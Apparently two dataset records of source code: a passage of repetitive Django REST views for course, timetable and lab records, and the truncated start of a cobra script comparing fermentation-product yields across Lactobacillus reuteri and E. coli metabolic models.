except Outcome.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class TimetablePostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Timetable.objects.filter(CourseID=CourseID)
except Timetable.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = TimetableSerializer(queryset, many=True)
else:
queryset = Timetable.objects.all()
read_serializer = TimetableSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = TimetableSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = TimetableSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class TimetablePutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Timetable.objects.get(ModelID=ModelID)
except Timetable.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = TimetableSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = TimetableSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Timetable.objects.get(ModelID=ModelID)
except Timetable.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class GradeDistributionPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = GradeDistribution.objects.filter(CourseID=CourseID)
except GradeDistribution.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = GradeDistributionSerializer(queryset, many=True)
else:
queryset = GradeDistribution.objects.all()
read_serializer = GradeDistributionSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = GradeDistributionSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = GradeDistributionSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class GradeDistributionPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = GradeDistribution.objects.get(ModelID=ModelID)
except GradeDistribution.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = GradeDistributionSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = GradeDistributionSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = GradeDistribution.objects.get(ModelID=ModelID)
except GradeDistribution.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class LecturePostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Lecture.objects.filter(CourseID=CourseID)
except Lecture.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = LectureSerializer(queryset, many=True)
else:
queryset = Lecture.objects.all()
read_serializer = LectureSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = LectureSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = LectureSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class LecturePutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Lecture.objects.get(ModelID=ModelID)
except Lecture.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = LectureSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = LectureSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Lecture.objects.get(ModelID=ModelID)
except Lecture.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class TutorialPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Tutorial.objects.filter(CourseID=CourseID)
except Tutorial.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = TutorialSerializer(queryset, many=True)
else:
queryset = Tutorial.objects.all()
read_serializer = TutorialSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = TutorialSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = TutorialSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class TutorialPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Tutorial.objects.get(ModelID=ModelID)
except Tutorial.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = TutorialSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = TutorialSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Tutorial.objects.get(ModelID=ModelID)
except Tutorial.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class CoursePostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Course.objects.filter(CourseID=CourseID)
except Course.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = CourseSerializer(queryset, many=True)
else:
queryset = Course.objects.all()
read_serializer = CourseSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = CourseSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = CourseSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class CoursePutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Course.objects.get(ModelID=ModelID)
except Course.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = CourseSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = CourseSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Course.objects.get(ModelID=ModelID)
except Course.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class TextbookPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Textbook.objects.filter(CourseID=CourseID)
except Textbook.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = TextbookSerializer(queryset, many=True)
else:
queryset = Textbook.objects.all()
read_serializer = TextbookSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = TextbookSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = TextbookSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class TextbookPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Textbook.objects.get(ModelID=ModelID)
except Textbook.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = TextbookSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = TextbookSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Textbook.objects.get(ModelID=ModelID)
except Textbook.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class AuWeightPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = AuWeight.objects.filter(CourseID=CourseID)
except AuWeight.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = AuWeightSerializer(queryset, many=True)
else:
queryset = AuWeight.objects.all()
read_serializer = AuWeightSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = AuWeightSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = AuWeightSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class AuWeightPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = AuWeight.objects.get(ModelID=ModelID)
except AuWeight.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = AuWeightSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = AuWeightSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = AuWeight.objects.get(ModelID=ModelID)
except AuWeight.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class ContentCategoryPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = ContentCategory.objects.filter(CourseID=CourseID)
except ContentCategory.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = ContentCategorySerializer(queryset, many=True)
else:
queryset = ContentCategory.objects.all()
read_serializer = ContentCategorySerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = ContentCategorySerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = ContentCategorySerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class ContentCategoryPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = ContentCategory.objects.get(ModelID=ModelID)
except ContentCategory.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = ContentCategorySerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = ContentCategorySerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = ContentCategory.objects.get(ModelID=ModelID)
except ContentCategory.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class LabPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Lab.objects.filter(CourseID=CourseID)
except Lab.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = LabSerializer(queryset, many=True)
else:
queryset = Lab.objects.all()
read_serializer = LabSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = LabSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = LabSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class LabPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Lab.objects.get(ModelID=ModelID)
except Lab.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = LabSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = LabSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Lab.objects.get(ModelID=ModelID)
except Lab.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class SectionPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Section.objects.filter(CourseID=CourseID)
except Section.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = SectionSerializer(queryset, many=True)
else:
queryset = Section.objects.all()
read_serializer = SectionSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = SectionSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = SectionSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class SectionPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Section.objects.get(ModelID=ModelID)
except Section.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = SectionSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = SectionSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Section.objects.get(ModelID=ModelID)
except Section.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
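# Every pair of classes above follows the same two shapes; a small factory along
# these lines could generate the GET/POST variant (a refactoring sketch only --
# the model and serializer classes are passed in explicitly rather than assumed):
def make_post_get_view(model_cls, serializer_cls):
    class _PostGetView(APIView, UpdateModelMixin, DestroyModelMixin):
        def get(self, request, CourseID=None):
            queryset = (model_cls.objects.filter(CourseID=CourseID)
                        if CourseID else model_cls.objects.all())
            return Response(serializer_cls(queryset, many=True).data)
        def post(self, request):
            create_serializer = serializer_cls(data=request.data)
            if create_serializer.is_valid():
                return Response(serializer_cls(create_serializer.save()).data, status=201)
            return Response(create_serializer.errors, status=400)
    return _PostGetView
# e.g. SectionPostGetView could equivalently be built as
# make_post_get_view(Section, SectionSerializer)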
| 37.65088
| 84
| 0.657777
| 2,736
| 27,824
| 6.580775
| 0.042398
| 0.097973
| 0.06065
| 0.074646
| 0.905026
| 0.873146
| 0.82005
| 0.82005
| 0.82005
| 0.82005
| 0
| 0.016172
| 0.253271
| 27,824
| 738
| 85
| 37.701897
| 0.850412
| 0.000827
| 0
| 0.861538
| 0
| 0
| 0.046836
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086154
| false
| 0
| 0.009231
| 0
| 0.332308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
06591a81f57be649455ef644c818b2583e2c7726
| 21,984
|
py
|
Python
|
ComplementaryScripts/Step_03_Compare_Refine/Step_refine_pipeline_part02_pathways.py
|
HaoLuoChalmers/Lactobacillus_reuteri_MM41A_GEM
|
9be6a48e7467e0c81b0b974180860d599fc9c201
|
[
"CC-BY-4.0"
] | null | null | null |
ComplementaryScripts/Step_03_Compare_Refine/Step_refine_pipeline_part02_pathways.py
|
HaoLuoChalmers/Lactobacillus_reuteri_MM41A_GEM
|
9be6a48e7467e0c81b0b974180860d599fc9c201
|
[
"CC-BY-4.0"
] | 1
|
2021-07-19T16:00:03.000Z
|
2021-07-19T16:00:03.000Z
|
ComplementaryScripts/Step_03_Compare_Refine/Step_refine_pipeline_part02_pathways.py
|
SysBioChalmers/Lactobacillus_reuteri_MM41A_GEM
|
9be6a48e7467e0c81b0b974180860d599fc9c201
|
[
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by Hao Luo at 4/22/20
"""Step_refine_pipeline_part03_amino_acids.py
:description : script to refine important metabolites
:param : metabolites list: [lac acet etoh 1,3-propanediol,reuterin,hista_HISDC]
:returns:
:rtype:
"""
import os
import cobra
import My_def
os.chdir('../../ComplementaryData/Step_03_Compare_Refine/')
# %%
Lreu_draft_3_refined = cobra.io.load_json_model('Lreu_draft_3_refined_part01.json')
Lreu_draft_3_refined.id = 'Lreu_draft_3_refined'
Lreuteri_530 = cobra.io.load_json_model('../Step_02_DraftModels/Template/template_models/Lreuteri_530_standlized.json')
iNF517 = cobra.io.load_json_model('../Step_02_DraftModels/Template/template_models/iNF517_standlized.json')
iML1515 = cobra.io.load_json_model('../Step_02_DraftModels/Template/template_models/iML1515_standlized.json')
iML1515.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
# %% <lac: >
met_i = Lreu_draft_3_refined.metabolites.get_by_id('lac__L_e')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
Lreu_draft_3_refined.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
objective_rea = 'EX_lac__L_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# experimental data: Y LACt/GLU = 0.469 0.682 0.076
for model_i in [Lreu_draft_3_refined, Lreuteri_530, iML1515, ]: # iNF517
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# close other carbon sources:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limitations:
model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except:
pass
model.objective = objective_rea
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('lac__L_c').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 3 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'T_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
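# Worked example of the yield formulas used above (the 20 mmol/gDW/h flux is a
# hypothetical number, not a model prediction): with glucose uptake fixed at
# 25 mmol/gDW/h (6 carbons per glucose) and a lactate secretion flux of
# 20 mmol/gDW/h (3 carbons per lactate), the carbon yield is
#     Y_c = 20 * 3 / (25 * 6) = 0.4
# i.e. 40 % of the consumed carbon leaves as lactate; Y_g_g applies the same
# ratio on a mass basis using the metabolites' formula weights.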
# %% <acet:> TODO:
met_i = Lreu_draft_3_refined.metabolites.get_by_id('ac_e')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
Lreu_draft_3_refined.reactions.get_by_id('EX_ac_e').bounds = (0, 1000)
Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('SADT2'))
Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('ADSK'))
Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('PAPSR'))
Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('BPNT'))
objective_rea = 'EX_ac_e' # 'EX_co2_e'#'EX_for_e'##,
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# experimental data: Y ac/GLU = 0.2170-0.33
for model_i in [Lreu_draft_3_refined, Lreuteri_530, iML1515, ]: # iNF517
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# close other carbon sources:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limations:
model.reactions.get_by_id('EX_for_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except:
pass
# rea = cobra.Reaction('NADHM')
# model.add_reaction(rea)
# model.reactions.get_by_id('NADHM').reaction = 'nadh_c + h_c --> nad_c'
# model.objective = 'NADHM'
model.objective = objective_rea
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('ac_e').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 2 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'Y_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
# %% <etoh:>
met_i = Lreu_draft_3_refined.metabolites.get_by_id('etoh_e')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
Lreu_draft_3_refined.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
objective_rea = 'EX_etoh_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# experiment data: Y ac/GLU = 0.2170-0.33
for model_i in [Lreu_draft_3_refined, Lreuteri_530, iML1515, ]: # iNF517
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# close other carbon sources:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limitations:
model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except Exception:
pass  # some of these exchange reactions are absent in certain models
# rea = cobra.Reaction('NADHM')
# model.add_reaction(rea)
# model.reactions.get_by_id('NADHM').reaction = 'nadh_c + h_c --> nad_c'
# model.objective = 'NADHM'
model.objective = objective_rea
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('etoh_e').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 2 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'Y_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
# %%<1-propanol: ppoh> TODO:
met_i = Lreu_draft_3_refined.metabolites.get_by_id('ppoh_c')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('MGSA'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('PPOHt'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('EX_ppoh_e'))
Lreu_draft_3_refined.reactions.get_by_id('EX_ppoh_e').bounds = (0, 1000)
objective_rea = 'EX_ppoh_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# experiment data: Y ac/GLU = 0.2170-0.33
for model_i in [Lreu_draft_3_refined, Lreuteri_530, ]: # iNF517iML1515,
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
# model.reactions.get_by_id('EX_glyc_e').bounds = (-10, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# close other carbon sources:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limitations:
model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except Exception:
pass  # some of these exchange reactions are absent in certain models
# rea = cobra.Reaction('NADHM')
# model.add_reaction(rea)
# model.reactions.get_by_id('NADHM').reaction = 'nadh_c + h_c --> nad_c'
# model.objective = 'NADHM'
model.objective = objective_rea
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('ppoh_c').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 3 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'Y_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
# %% <1,3-propanediol ~> TODO:
met_i = Lreu_draft_3_refined.metabolites.get_by_id('13ppd_c')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
# Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('PPN13D'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('PPDt1'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('EX_13ppd_e'))
# Lreu_draft_3_refined.reactions.get_by_id('EX_glyc_e').bounds = (0,1000)
Lreu_draft_3_refined.reactions.get_by_id('EX_13ppd_e').bounds = (0, 1000)
objective_rea = 'EX_13ppd_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# Y = Lreu_draft_3_refined.optimize().objective_value * Lreu_draft_3_refined.metabolites.get_by_id('13ppd_e').formula_weight\
# /(10*Lreu_draft_3_refined.metabolites.get_by_id('glc__D_e').formula_weight )
# solution = Lreu_draft_3_refined.optimize()
# print(Y)
# My_def.io_file.solution2txt(solution,Lreu_draft_3_refined,'Lreu_draft_3_refined_temp_flux.txt')
for model_i in [Lreu_draft_3_refined, Lreuteri_530, ]: # iNF517,iML1515,
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# close other carbon sources:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
